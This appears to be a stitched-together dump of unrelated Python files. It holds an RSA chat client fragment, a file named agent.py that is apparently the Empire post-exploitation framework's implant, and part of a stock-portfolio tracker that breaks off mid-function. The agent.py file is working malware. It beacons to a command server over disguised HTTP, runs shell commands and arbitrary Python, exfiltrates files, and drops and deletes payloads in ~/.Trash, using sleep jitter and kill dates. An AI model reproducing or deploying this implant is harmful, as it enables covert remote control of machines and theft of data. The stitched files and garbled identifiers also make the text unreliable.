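#   decrypt_message(priv, ciphertext)  # -> "hello"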
def generate_keys(username_own):
public,private = generate_rsa_key()
f = open("self_keys.dat","wb")
d = {
"public_own" : public,
"private_own" : private,
"chat_id" : 0
}
pickle.dump(d,f)
f.close()
data = {
"username": username_own,
"public_n": public.n,
"public_e":public.e}
response = requests.post(url+"/send_public_key", json= data)
def check_exist():
try:
f = open("self_keys.dat", "rb")
f.close()
return True
except:
return False
def send_message(to_username,from_username):
message = input("Enter Your Message : ")
f = open("user_keys.dat", "rb+")
while True:
data = pickle.load(f)
if data["username_target"] == to_username:
public_key = data["public_key"]
break
a = encrypt_message(public_key, message)
enc_message = base64.b64encode(a)
data = {
"username":to_username,
"message":enc_message.decode("utf-8"),
"from_username":from_username
}
response = requests.post(url,json = data)
def __init__():
username_target = input("Enter Username Of Your Friend : ")
if check_exist():
if have_key(username_target):
while True:
send_message(username_target, username_own)
else:
ask_key(username_target)
while True:
send_message(username_target, username_own)
else:
generate_keys(username_own)
__init__()
def have_key(username_target):
try:
f = open("user_keys.dat","rb")
while True:
data=pickle.load(f)
if data["username"] == username_target:
return True
f.close()
except:
return False
def ask_key(username_target):
response = requests.get(url+"/ask_key",params={"username":username_target})
data = response.json()
public_n = data["public_n"]
public_e = data["public_e"]
f = open("user_keys.dat","ab")
d = {
"username_target" : username_target,
"public_key":rsa.PublicKey(public_n, public_e)
}
pickle.dump(d,f)
f.close()
def receive_message(username_own):
f = open("self_keys.dat", "rb+")
data = pickle.load(f)
public_own = data["public_own"]
private_own = data["private_own"]
last_chat_id = data["chat_id"]
f.close()
response = requests.get(url+"/check_message",params={"username":username_own,"last_chat_id":
last_chat_id})
try:
data = response.json()
messages = data["message"]
users = data["username"]
chat_id = data["chat_id"]
a = zip(messages,users,chat_id)
for message,user,chat in a:
message = base64.b64decode(message.encode("utf-8"))
message = decrypt_message(private_own,message)
print("\n"+bcolors.FAIL + user + " : " + message + bcolors.ENDC)
last_chat_id = chat
except:
pass
f = open("self_keys.dat","wb")
d = {
"public_own" : public_own,
"private_own" : private_own,
"chat_id" : last_chat_id
}
pickle.dump(d,f)
f.close()
def loop():
while True:
receive_message(username_own)
time.sleep(1)
def create_bg_thread():
t1 = Thread(target = loop)
t2 = Thread(target = __init__)
t1.setDaemon(True)
t2.setDaemon(True)
t1.start()
t2.start()
def begin_texting():
a = input("Are you a new user (y/n) : ")
global username_own
username_own = input("Enter You Username : ")
if (a == "y"):
generate_keys(username_own)
create_bg_thread()
while True:
pass
else:
create_bg_thread()
while True:
pass
begin_texting()
#create_bg_thread()
#__init__()
#receive_message("shahrukh")
|
agent.py
|
import __future__
import zipfile
import io
from urllib import urlopen
import struct, time, base64, subprocess, random, time, datetime
from os.path import expanduser
from StringIO import StringIO
from threading import Thread
import os
import sys
import trace
import shlex
import zlib
import threading
import BaseHTTPServer
import zipfile
import imp
################################################
#
# agent configuration information
#
################################################
# print "starting agent"
# profile format ->
# tasking uris | user agent | additional header 1 | additional header 2 | ...
profile = "/admin/get.php,/news.asp,/login/process.jsp|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
if server.endswith("/"): server = server[0:-1]
delay = 60
jitter = 0.0
lostLimit = 60
missedCheckins = 0
jobMessageBuffer = ""
# killDate form -> "MO/DAY/YEAR"
killDate = ""
# workingHours form -> "9:00-17:00"
workingHours = ""
parts = profile.split("|")
taskURIs = parts[0].split(",")
userAgent = parts[1]
headersRaw = parts[2:]
defaultPage = base64.b64decode("")
_meta_cache = {}
moduleRepo = {}
jobs = []
global t
# global header dictionary
# sessionID is set by stager.py
headers = {'User-Agent': userAgent, "Cookie": "SESSIONID=%s" %(sessionID)}
# parse the headers into the global header dictionary
for headerRaw in headersRaw:
try:
headerKey = headerRaw.split(":")[0]
headerValue = headerRaw.split(":")[1]
if headerKey.lower() == "cookie":
headers['Cookie'] = "%s;%s" %(headers['Cookie'], headerValue)
else:
headers[headerKey] = headerValue
except:
pass
################################################
#
# communication methods
#
################################################
def sendMessage(packets=None):
"""
Requests a tasking or posts data to a randomized tasking URI.
If packets == None, the agent GETs a tasking from the control server.
If packets != None, the agent encrypts the passed packets and
POSTs the data to the control server.
"""
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = "".join(packets)
data = aes_encrypt_then_hmac(key, data)
taskURI = random.sample(taskURIs, 1)[0]
if (server.endswith(".php")):
# if we have a redirector host already
requestUri = server
else:
requestUri = server + taskURI
try:
data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read()
return ("200", data)
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an error (like 404)
missedCheckins = missedCheckins + 1
return (HTTPError.code, "")
except urllib2.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, "")
return ("","")
################################################
#
# encryption methods
#
################################################
def encodePacket(taskingID, packetData):
"""
Encode a response packet.
[4 bytes] - type
[4 bytes] - counter
[4 bytes] - length
[X...] - tasking data
"""
# packetData = packetData.encode('utf-8').strip()
taskID = struct.pack('=L', taskingID)
counter = struct.pack('=L', 0)
if(packetData):
length = struct.pack('=L',len(packetData))
else:
length = struct.pack('=L',0)
# b64data = base64.b64encode(packetData)
if(packetData):
packetData = packetData.decode('ascii', 'ignore').encode('ascii')
return taskID + counter + length + packetData
def decodePacket(packet, offset=0):
"""
Parse a tasking packet, returning (PACKET_TYPE, counter, length, data, REMAINING_PACKETES)
[4 bytes] - type
[4 bytes] - counter
[4 bytes] - length
[X...] - tasking data
[Y...] - remainingData (possibly nested packet)
"""
try:
responseID = struct.unpack('=L', packet[0+offset:4+offset])[0]
counter = struct.unpack('=L', packet[4+offset:8+offset])[0]
length = struct.unpack('=L', packet[8+offset:12+offset])[0]
# data = base64.b64decode(packet[12+offset:12+offset+length])
data = packet[12+offset:12+offset+length]
remainingData = packet[12+offset+length:]
return (responseID, counter, length, data, remainingData)
except Exception as e:
print "decodePacket exception:",e
return (None, None, None, None, None)
def processTasking(data):
# processes an encrypted data packet
# -decrypts/verifies the response to get
# -extracts the packets and processes each
try:
tasking = aes_decrypt_and_verify(key, data)
(taskingID, counter, length, data, remainingData) = decodePacket(tasking)
# if we get to this point, we have a legit tasking so reset missedCheckins
missedCheckins = 0
# execute/process the packets and get any response
resultPackets = ""
result = processPacket(taskingID, data)
if result:
resultPackets += result
packetOffset = 12 + length
while remainingData and remainingData != "":
(taskingID, counter, length, data, remainingData) = decodePacket(tasking, offset=packetOffset)
result = processPacket(taskingID, data)
if result:
resultPackets += result
packetOffset += 12 + length
sendMessage(resultPackets)
except Exception as e:
print "processTasking exception:",e
pass
def processJobTasking(result):
# process job data packets
# - returns to the C2
# execute/process the packets and get any response
try:
resultPackets = ""
if result:
resultPackets += result
# send packets
sendMessage(resultPackets)
except Exception as e:
print "processJobTasking exception:",e
pass
def processPacket(taskingID, data):
try:
taskingID = int(taskingID)
except Exception as e:
return None
if taskingID == 1:
# sysinfo request
# get_sysinfo should be exposed from stager.py
return encodePacket(1, get_sysinfo())
elif taskingID == 2:
# agent exit
msg = "[!] Agent %s exiting" %(sessionID)
sendMessage(encodePacket(2, msg))
agent_exit()
elif taskingID == 40:
# run a command
resultData = str(run_command(data))
return encodePacket(40, resultData)
elif taskingID == 41:
# file download
filePath = os.path.abspath(data)
if not os.path.exists(filePath):
return encodePacket(40, "file does not exist or cannot be accessed")
offset = 0
size = os.path.getsize(filePath)
partIndex = 0
while True:
# get 512kb of the given file starting at the specified offset
encodedPart = get_file_part(filePath, offset=offset, base64=False)
c = compress()
start_crc32 = c.crc32_data(encodedPart)
comp_data = c.comp_data(encodedPart)
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart)
partData = "%s|%s|%s" %(partIndex, filePath, encodedPart)
if not encodedPart or encodedPart == '' or len(encodedPart) == 16:
break
sendMessage(encodePacket(41, partData))
global delay
global jitter
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = 1/jitter
minSleep = int((1.0-jitter)*delay)
maxSleep = int((1.0+jitter)*delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
partIndex += 1
offset += 5120000
elif taskingID == 42:
# file upload
try:
parts = data.split("|")
filePath = parts[0]
base64part = parts[1]
raw = base64.b64decode(base64part)
d = decompress()
dec_data = d.dec_data(raw, cheader=True)
if not dec_data['crc32_check']:
sendMessage(encodePacket(0, "[!] WARNING: File upload failed crc32 check during decompressing!."))
sendMessage(encodePacket(0, "[!] HEADER: Start crc32: %s -- Received crc32: %s -- Crc32 pass: %s!." %(dec_data['header_crc32'],dec_data['dec_crc32'],dec_data['crc32_check'])))
f = open(filePath, 'ab')
f.write(dec_data['data'])
f.close()
sendMessage(encodePacket(42, "[*] Upload of %s successful" %(filePath) ))
except Exception as e:
sendec_datadMessage(encodePacket(0, "[!] Error in writing file %s during upload: %s" %(filePath, str(e)) ))
elif taskingID == 50:
# return the currently running jobs
msg = ""
if len(jobs) == 0:
msg = "No active jobs"
else:
msg = "Active jobs:\n"
for x in xrange(len(jobs)):
msg += "\t%s" %(x)
return encodePacket(50, msg)
elif taskingID == 51:
# stop and remove a specified job if it's running
try:
# Calling join first seems to hang
# result = jobs[int(data)].join()
sendMessage(encodePacket(0, "[*] Attempting to stop job thread"))
result = jobs[int(data)].kill()
sendMessage(encodePacket(0, "[*] Job thread stoped!"))
jobs[int(data)]._Thread__stop()
jobs.pop(int(data))
if result and result != "":
sendMessage(encodePacket(51, result))
except:
return encodePacket(0, "error stopping job: %s" %(data))
elif taskingID == 100:
# dynamic code execution, wait for output, don't save output
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec code_obj in globals()
sys.stdout = sys.__stdout__
results = buffer.getvalue()
return encodePacket(100, str(results))
except Exception as e:
errorData = str(buffer.getvalue())
return encodePacket(0, "error executing specified Python data: %s \nBuffer data recovered:\n%s" %(e, errorData))
elif taskingID == 101:
# dynamic code execution, wait for output, save output
prefix = data[0:15].strip()
extension = data[15:20].strip()
data = data[20:]
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec code_obj in globals()
sys.stdout = sys.__stdout__
c = compress()
start_crc32 = c.crc32_data(buffer.getvalue())
comp_data = c.comp_data(buffer.getvalue())
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart)
return encodePacket(101, '{0: <15}'.format(prefix) + '{0: <5}'.format(extension) + encodedPart )
except Exception as e:
# Also return partial code that has been executed
errorData = str(buffer.getvalue())
return encodePacket(0, "error executing specified Python data %s \nBuffer data recovered:\n%s" %(e, errorData))
elif taskingID == 102:
# on disk code execution for modules that require multiprocessing not supported by exec
try:
implantHome = expanduser("~") + '/.Trash/'
moduleName = ".mac-debug-data"
implantPath = implantHome + moduleName
result = "[*] Module disk path: %s \n" %(implantPath)
with open(implantPath, 'w') as f:
f.write(data)
result += "[*] Module properly dropped to disk \n"
pythonCommand = "python %s" %(implantPath)
process = subprocess.Popen(pythonCommand, stdout=subprocess.PIPE, shell=True)
data = process.communicate()
result += data[0].strip()
try:
os.remove(implantPath)
result += "\n[*] Module path was properly removed: %s" %(implantPath)
except Exception as e:
print "error removing module filed: %s" %(e)
fileCheck = os.path.isfile(implantPath)
if fileCheck:
result += "\n\nError removing module file, please verify path: " + str(implantPath)
return encodePacket(100, str(result))
except Exception as e:
fileCheck = os.path.isfile(implantPath)
if fileCheck:
return encodePacket(0, "error executing specified Python data: %s \nError removing module file, please verify path: %s" %(e, implantPath))
return encodePacket(0, "error executing specified Python data: %s" %(e))
elif taskingID == 110:
start_job(data)
return encodePacket(110, "job %s started" %(len(jobs)-1))
elif taskingID == 111:
# TASK_CMD_JOB_SAVE
# TODO: implement job structure
pass
elif taskingID == 122:
try:
#base64 and decompress the data.
parts = data.split('|')
fileName = parts[0]
base64part = parts[1]
raw = base64.b64decode(base64part)
d = decompress()
dec_data = d.dec_data(raw, cheader=True)
if not dec_data['crc32_check']:
sendMessage(encodePacket(122, "[!] WARNING: Module import failed crc32 check during decompressing!."))
sendMessage(encodePacket(122, "[!] HEADER: Start crc32: %s -- Received crc32: %s -- Crc32 pass: %s!." %(dec_data['header_crc32'],dec_data['dec_crc32'],dec_data['crc32_check'])))
except:
sendec_datadMessage(encodePacket(122, "[!] Error in Importing module %s during upload: %s" %(fileName, str(e)) ))
zf = zipfile.ZipFile(io.BytesIO(dec_data['data']), 'r')
moduleRepo[fileName] = zf
install_hook(fileName)
sendMessage(encodePacket(122, "Import of %s successful" %(fileName)))
elif taskingID == 123:
#Remove a module repo
repoName = data
try:
remove_hook(repoName)
sendMessage(encodePacket(123, "%s repo successfully removed" % (repoName)))
except Exception as e:
sendMessage(encodePacket(123, "Unable to remove repo: %s : %s" % (repoName, str(e))))
elif taskingID == 124:
#List all module repos and their contents
repoName = data
if repoName == "":
loadedModules = "\nAll Repos\n"
for key, value in moduleRepo.items():
loadedModules += "\n----"+key+"----\n"
loadedModules += '\n'.join(moduleRepo[key].namelist())
sendMessage(encodePacket(124, loadedModules))
else:
try:
loadedModules = "\n----"+repoName+"----\n"
loadedModules += '\n'.join(moduleRepo[repoName].namelist())
sendMessage(encodePacket(124, loadedModules))
except Exception as e:
msg = "Unable to retrieve repo contents: %s" % (str(e))
sendMessage(encodePacket(124, msg))
else:
return encodePacket(0, "invalid tasking ID: %s" %(taskingID))
################################################
#
# Custom Zip Importer
#
################################################
#adapted from https://github.com/sulinx/remote_importer
# [0] = .py ext, is_package = False
# [1] = /__init__.py ext, is_package = True
_search_order = [('.py', False), ('/__init__.py', True)]
class ZipImportError(ImportError):
"""Exception raised by zipimporter objects."""
# _get_info() = takes the fullname, then subpackage name (if applicable),
# and searches for the respective module or package
class CFinder(object):
"""Import Hook for Empire"""
def __init__(self, repoName):
self.repoName = repoName
self._source_cache = {}
def _get_info(self, repoName, fullname):
"""Search for the respective package or module in the zipfile object"""
parts = fullname.split('.')
submodule = parts[-1]
modulepath = '/'.join(parts)
#check to see if that specific module exists
for suffix, is_package in _search_order:
relpath = modulepath + suffix
try:
moduleRepo[repoName].getinfo(relpath)
except KeyError:
pass
else:
return submodule, is_package, relpath
#Error out if we can't find the module/package
msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
raise ZipImportError(msg)
def _get_source(self, repoName, fullname):
"""Get the source code for the requested module"""
submodule, is_package, relpath = self._get_info(repoName, fullname)
fullpath = '%s/%s' % (repoName, relpath)
if relpath in self._source_cache:
source = self._source_cache[relpath]
return submodule, is_package, fullpath, source
try:
source = moduleRepo[repoName].read(relpath)
source = source.replace('\r\n', '\n')
source = source.replace('\r', '\n')
self._source_cache[relpath] = source
return submodule, is_package, fullpath, source
except:
raise ZipImportError("Unable to obtain source for module %s" % (fullpath))
def find_module(self, fullname, path=None):
try:
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
except ImportError:
return None
else:
return self
def load_module(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
code = compile(source, fullpath, 'exec')
mod = sys.modules.setdefault(fullname, imp.new_module(fullname))
mod.__loader__ = self
mod.__file__ = fullpath
mod.__name__ = fullname
if is_package:
mod.__path__ = [os.path.dirname(mod.__file__)]
exec code in mod.__dict__
return mod
def get_data(self, fullpath):
prefix = os.path.join(self.repoName, '')
if not fullpath.startswith(prefix):
raise IOError('Path %r does not start with module name %r', (fullpath, prefix))
relpath = fullpath[len(prefix):]
try:
return moduleRepo[self.repoName].read(relpath)
except KeyError:
raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))
def is_package(self, fullname):
"""Return if the module is a package"""
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
return is_package
def get_code(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
return compile(source, fullpath, 'exec')
def install_hook(repoName):
if repoName not in _meta_cache:
finder = CFinder(repoName)
_meta_cache[repoName] = finder
sys.meta_path.append(finder)
def remove_hook(repoName):
if repoName in _meta_cache:
finder = _meta_cache.pop(repoName)
sys.meta_path.remove(finder)
################################################
#
# misc methods
#
################################################
class compress(object):
'''
Base class for init of the package. This will handle
the initial object creation for conducting basic functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def comp_data(self, data, cvalue=COMP_RATIO):
'''
Takes in a string and computes
the comp obj.
data = string wanting compression
cvalue = 0-9 comp value (default 6)
'''
cdata = zlib.compress(data,cvalue)
return cdata
def crc32_data(self, data):
'''
Takes in a string and computes crc32 value.
data = string before compression
returns:
HEX bytes of data
'''
crc = zlib.crc32(data) & 0xFFFFFFFF
return crc
def build_header(self, data, crc):
'''
Takes comp data, org crc32 value,
and adds self header.
data = comp data
crc = crc32 value
'''
header = struct.pack("!I",crc)
built_data = header + data
return built_data
class decompress(object):
'''
Base class for init of the package. This will handle
the initial object creation for conducting basic functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def dec_data(self, data, cheader=True):
'''
Takes:
Custom / standard header data
data = comp data with zlib header
BOOL cheader = passing custom crc32 header
returns:
dict with crc32 check and dec data string
ex. {"crc32" : true, "dec_data" : "-SNIP-"}
'''
if cheader:
comp_crc32 = struct.unpack("!I", data[:self.CRC_HSIZE])[0]
dec_data = zlib.decompress(data[self.CRC_HSIZE:])
dec_crc32 = zlib.crc32(dec_data) & 0xFFFFFFFF
if comp_crc32 == dec_crc32:
crc32 = True
else:
crc32 = False
return { "header_crc32" : comp_crc32, "dec_crc32" : dec_crc32, "crc32_check" : crc32, "data" : dec_data }
else:
dec_data = zlib.decompress(data)
return dec_data
def agent_exit():
# exit for proper job / thread cleanup
if len(jobs) > 0:
try:
for x in jobs:
jobs[int(x)].kill()
jobs.pop(x)
except:
# die hard if thread kill fails
pass
exit()
def indent(lines, amount=4, ch=' '):
padding = amount * ch
return padding + ('\n'+padding).join(lines.split('\n'))
# from http://stackoverflow.com/questions/6893968/how-to-get-the-return-value-from-a-thread-in-python
class ThreadWithReturnValue(Thread):
def __init__(self, group=None, target=None, name=None,
args=(), kwargs={}, Verbose=None):
Thread.__init__(self, group, target, name, args, kwargs, Verbose)
self._return = None
def run(self):
if self._Thread__target is not None:
self._return = self._Thread__target(*self._Thread__args,
**self._Thread__kwargs)
def join(self):
Thread.join(self)
return self._return
class KThread(threading.Thread):
"""A subclass of threading.Thread, with a kill()
method."""
def __init__(self, *args, **keywords):
threading.Thread.__init__(self, *args, **keywords)
self.killed = False
def start(self):
"""Start the thread."""
self.__run_backup = self.run
self.run = self.__run # Force the Thread to install our trace.
threading.Thread.start(self)
def __run(self):
"""Hacked run function, which installs the
trace."""
sys.settrace(self.globaltrace)
self.__run_backup()
self.run = self.__run_backup
def globaltrace(self, frame, why, arg):
if why == 'call':
return self.localtrace
else:
return None
def localtrace(self, frame, why, arg):
if self.killed:
if why == 'line':
raise SystemExit()
return self.localtrace
def kill(self):
self.killed = True
def start_job(code):
global jobs
# create a new code block with a defined method name
codeBlock = "def method():\n" + indent(code)
# register the code block
code_obj = compile(codeBlock, '<string>', 'exec')
# code needs to be in the global listing
# not the locals() scope
exec code_obj in globals()
# create/start/return the thread
# call the job_func so sys data can be captured
codeThread = KThread(target=job_func)
codeThread.start()
jobs.append(codeThread)
def job_func():
try:
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
# now call the function required
# and capture the output via sys
method()
sys.stdout = old_stdout
dataStats_2 = mystdout.getvalue()
result = encodePacket(110, str(dataStats_2))
processJobTasking(result)
except Exception as e:
p = "error executing specified Python job data: " + str(e)
result = encodePacket(0, p)
processJobTasking(result)
def job_message_buffer(message):
# Supports job messages for checkin
global jobMessageBuffer
try:
jobMessageBuffer += str(message)
except Exception as e:
print e
def get_job_message_buffer():
global jobMessageBuffer
try:
result = encodePacket(110, str(jobMessageBuffer))
jobMessageBuffer = ""
return result
except Exception as e:
return encodePacket(0, "[!] Error getting job output: %s" %(e))
def send_job_message_buffer():
if len(jobs) > 0:
result = get_job_message_buffer()
processJobTasking(result)
else:
pass
def start_webserver(data, ip, port, serveCount):
# thread data_webserver for execution
t = KThread(target=data_webserver, args=(data, ip, port, serveCount))
t.start()
return
def data_webserver(data, ip, port, serveCount):
# hosts a file on port and IP servers data string
hostName = str(ip)
portNumber = int(port)
data = str(data)
serveCount = int(serveCount)
count = 0
class serverHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(s):
"""Respond to a GET request."""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(data)
def log_message(s, format, *args):
return
server_class = BaseHTTPServer.HTTPServer
httpServer = server_class((hostName, portNumber), serverHandler)
try:
while (count < serveCount):
httpServer.handle_request()
count += 1
except:
pass
httpServer.server_close()
return
# additional implementation methods
def run_command(command):
if "|" in command:
command_parts = command.split('|')
elif ">" in command or ">>" in command or "<" in command or "<<" in command:
p = subprocess.Popen(command,stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
return ''.join(list(iter(p.stdout.readline, b'')))
else:
command_parts = []
command_parts.append(command)
i = 0
p = {}
for command_part in command_parts:
command_part = command_part.strip()
if i == 0:
p[i]=subprocess.Popen(shlex.split(command_part),stdin=None, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
p[i]=subprocess.Popen(shlex.split(command_part),stdin=p[i-1].stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
i = i +1
(output, err) = p[i-1].communicate()
exit_code = p[0].wait()
if exit_code != 0:
errorStr = "Shell Output: " + str(output) + '\n'
errorStr += "Shell Error: " + str(err) + '\n'
return errorStr
else:
return str(output)
def get_file_part(filePath, offset=0, chunkSize=512000, base64=True):
if not os.path.exists(filePath):
return ''
f = open(filePath, 'rb')
f.seek(offset, 0)
data = f.read(chunkSize)
f.close()
if base64:
return base64.b64encode(data)
else:
return data
################################################
#
# main agent functionality
#
################################################
while(True):
# TODO: jobs functionality
if workingHours != "":
try:
start,end = workingHours.split("-")
now = datetime.datetime.now()
startTime = datetime.datetime.strptime(start, "%H:%M")
endTime = datetime.datetime.strptime(end, "%H:%M")
if not (startTime <= now <= endTime):
sleepTime = startTime - now
# print "not in working hours, sleeping %s seconds" %(sleepTime.seconds)
# sleep until the start of the next window
time.sleep(sleepTime.seconds)
except Exception as e:
pass
# check if we're past the killdate for this agent
# killDate form -> MO/DAY/YEAR
if killDate != "":
now = datetime.datetime.now().date()
killDateTime = datetime.datetime.strptime(killDate, "%m/%d/%Y").date()
if now > killDateTime:
msg = "[!] Agent %s exiting" %(sessionID)
sendMessage(encodePacket(2, msg))
agent_exit()
# exit if we miss communicating with the server enough times
if missedCheckins >= lostLimit:
agent_exit()
# sleep for the randomized interval
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = 1/jitter
minSleep = int((1.0-jitter)*delay)
maxSleep = int((1.0+jitter)*delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
(code, data) = sendMessage()
if code == "200":
try:
send_job_message_buffer()
except Exception as e:
result = encodePacket(0, str('[!] Failed to check job buffer!: ' + str(e)))
processJobTasking(result)
if data == defaultPage:
missedCheckins = 0
else:
processTasking(data)
else:
pass
# print "invalid code:",code
|
invest.py
|
import tinvest
import pandas as pd
import requests
import yfinance as yf
import numpy as np
import copy
import time
import traceback
import logging
from dataclasses import dataclass
from datetime import datetime, timedelta
from pathlib import Path
from typing import Optional, Union, List, Dict, Iterable
from threading import Thread, RLock
from math import ceil
from tqdm import tqdm
import pygsheets
import telegram
from telegram.ext import Updater
import plotly.graph_objects as go
from .config import TINKOFF_API_TOKEN, GOOGLE_SA_CONFIG, BOT_TOKEN, PERSONAL_CHAT_ID
@dataclass
class Stock:
name: str
ticker: str
current_price: float
sp100_weight: float
sp100_lots: int
my_lots: int
avg_buy_price: Optional[float]
@property
def total_price(self) -> float:
return self.current_price * self.my_lots
@property
def profit(self) -> float:
return self.current_price / self.avg_buy_price - 1 if self.avg_buy_price else 0.0
@property
def expected_yield(self) -> float:
return (self.current_price - self.avg_buy_price) * self.my_lots if self.avg_buy_price else 0.0
def __copy__(self) -> 'Stock':
return Stock(self.name, self.ticker, self.current_price, self.sp100_weight, self.sp100_lots, self.my_lots, self.avg_buy_price)
class Investments:
def __init__(self, tinkoff_token: str, google_sa_config: str, history_path: str):
self._tinkoff_token = tinkoff_token
self._google_sa_config = google_sa_config
self._history_path = history_path
self._stocks = []
self._free_usd = 0.0
self._expected_portfolio_cost = 5000.0
@staticmethod
def _fix_tickers(tickers: str):
return tickers.replace('.', '-')
@staticmethod
def _get_historical_price(tickers: str, period: str, interval: str, price_type: str = 'Close') -> pd.DataFrame:
tickers = Investments._fix_tickers(tickers).split()
prices = []
for ticker in tickers:
while True:
try:
info = yf.download(ticker, period=period, progress=False, prepost=True, interval=interval, threads=False)
info = info[price_type]
break
except:
logging.warning(f'Failed to fetch current price for {ticker}, retrying in 1 second')
time.sleep(1)
prices.append(info)
result = pd.concat(prices, axis=1, join='outer')
result.columns = tickers
result = result.fillna(method='ffill').fillna(method='bfill').fillna(value=0.0)
return result
@staticmethod
def _get_today_price(tickers: str, price_type: str = 'Close') -> Union[float, List[float]]:
tickers = Investments._fix_tickers(tickers)
info = Investments._get_historical_price(tickers, period='5d', interval='1h', price_type=price_type)
today_row = info.iloc[-1, :]
prices = list(today_row)
return prices[0] if len(prices) == 1 else prices
@staticmethod
def _sample_sp100(expected_cost: float) -> Dict[str, Stock]:
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'X-Requested-With': 'XMLHttpRequest'
}
resp = requests.get('https://www.slickcharts.com/sp500', headers=headers)
sp500 = pd.read_html(resp.text)[0]
sp100 = sp500[:100]
# price * lots / budget = weight
samples = pd.DataFrame(columns=['Company', 'Ticker', 'Price', 'Weight', 'Lots'])
samples['Company'] = sp100['Company']
samples['Ticker'] = sp100['Symbol']
samples['Price'] = Investments._get_today_price(' '.join(samples['Ticker'].to_numpy()))
samples['Weight'] = sp100['Weight'] / sp100['Weight'].sum()
samples['Lots'] = (samples['Weight'] * expected_cost / samples['Price']).round().astype(int)
stocks = {}
for _, row in samples.iterrows():
stocks[row['Ticker']] = Stock(
name=row['Company'],
ticker=row['Ticker'],
current_price=row['Price'],
sp100_weight=row['Weight'],
sp100_lots=row['Lots'],
my_lots=0,
avg_buy_price=None
)
return stocks
def _get_positions(self):
client = tinvest.SyncClient(
token=self._tinkoff_token
)
return client.get_portfolio().payload.positions
def _get_operations(self):
client = tinvest.SyncClient(
token=self._tinkoff_token
)
return client.get_operations(from_=datetime.fromtimestamp(0), to=datetime.utcnow()).payload.operations
def _get_total_buy_price(self):
operations = self._get_operations()
total_buy_price = 0.0
for operation in operations:
if operation.status != tinvest.OperationStatus.done:
continue
if operation.instrument_type == tinvest.InstrumentType.currency and operation.figi == 'BBG0013HGFT4': # usd
if operation.operation_type in [tinvest.OperationType.buy, tinvest.OperationTypeWithCommission.buy]:
total_buy_price += operation.quantity
if operation.operation_type in [tinvest.OperationType.sell, tinvest.OperationTypeWithCommission.sell]:
total_buy_price -= operation.quantity
continue
if operation.currency == tinvest.Currency.usd and operation.operation_type == tinvest.OperationTypeWithCommission.pay_in:
total_buy_price += float(operation.payment)
continue
return total_buy_price
def _get_total_current_price(self):
return sum(stock.current_price * stock.my_lots for stock in self._stocks) + self._free_usd
def update_stock_info(self):
all_positions = self._get_positions()
stock_positions = list(filter(lambda pos: pos.instrument_type == tinvest.InstrumentType.stock and
pos.average_position_price.currency == tinvest.Currency.usd,
all_positions))
self._free_usd = 0.0
for pos in all_positions:
if pos.instrument_type == tinvest.InstrumentType.currency:
self._free_usd = float(pos.balance)
today_prices = [float((pos.average_position_price.value * pos.lots + pos.expected_yield.value) / pos.lots) for pos in stock_positions]
current_portfolio_cost = sum(pos.lots * price for pos, price in zip(stock_positions, today_prices))
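# The target cost below is grown in 1.5x steps until it covers the current holdings,
# then rounded up to the next multiple of 5000 (e.g. 12300 -> 15000).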
while self._expected_portfolio_cost < current_portfolio_cost:
self._expected_portfolio_cost *= 1.5
self._expected_portfolio_cost = ceil(self._expected_portfolio_cost / 5000.0) * 5000.0
stocks = self._sample_sp100(self._expected_portfolio_cost)
for pos, price in tqdm(zip(stock_positions, today_prices)):
if pos.ticker in stocks:
stocks[pos.ticker].my_lots = pos.lots
stocks[pos.ticker].avg_buy_price = float(pos.average_position_price.value)
else:
stocks[pos.ticker] = Stock(
name=pos.name,
ticker=pos.ticker,
current_price=price,
sp100_weight=0.0,
sp100_lots=0,
my_lots=pos.lots,
avg_buy_price=float(pos.average_position_price.value)
)
ordered_stocks = list(filter(lambda stock: stock.my_lots > 0 or stock.sp100_lots > 0, stocks.values()))
ordered_stocks.sort(key=lambda stock: (-stock.sp100_weight, stock.ticker))
self._stocks = ordered_stocks
def update_spreadsheet(self):
gc = pygsheets.authorize(client_secret=None, service_account_file=self._google_sa_config)
sh: pygsheets.Spreadsheet = gc.open('invest')
wks: pygsheets.Worksheet = sh.sheet1
wks.clear(fields='*')
header: pygsheets.DataRange = wks.range('A1:E1', returnas='range')
for cell in header.cells[0]:
cell.set_text_format('bold', True)
header.update_values([['Company', 'Ticker', 'Price', 'Lots', 'Profit']])
data = []
for i, stock in enumerate(self._stocks):
row = [
pygsheets.Cell(pos=f'A{i+2}', val=stock.name),
pygsheets.Cell(pos=f'B{i+2}', val=stock.ticker),
pygsheets.Cell(pos=f'C{i+2}', val=stock.current_price),
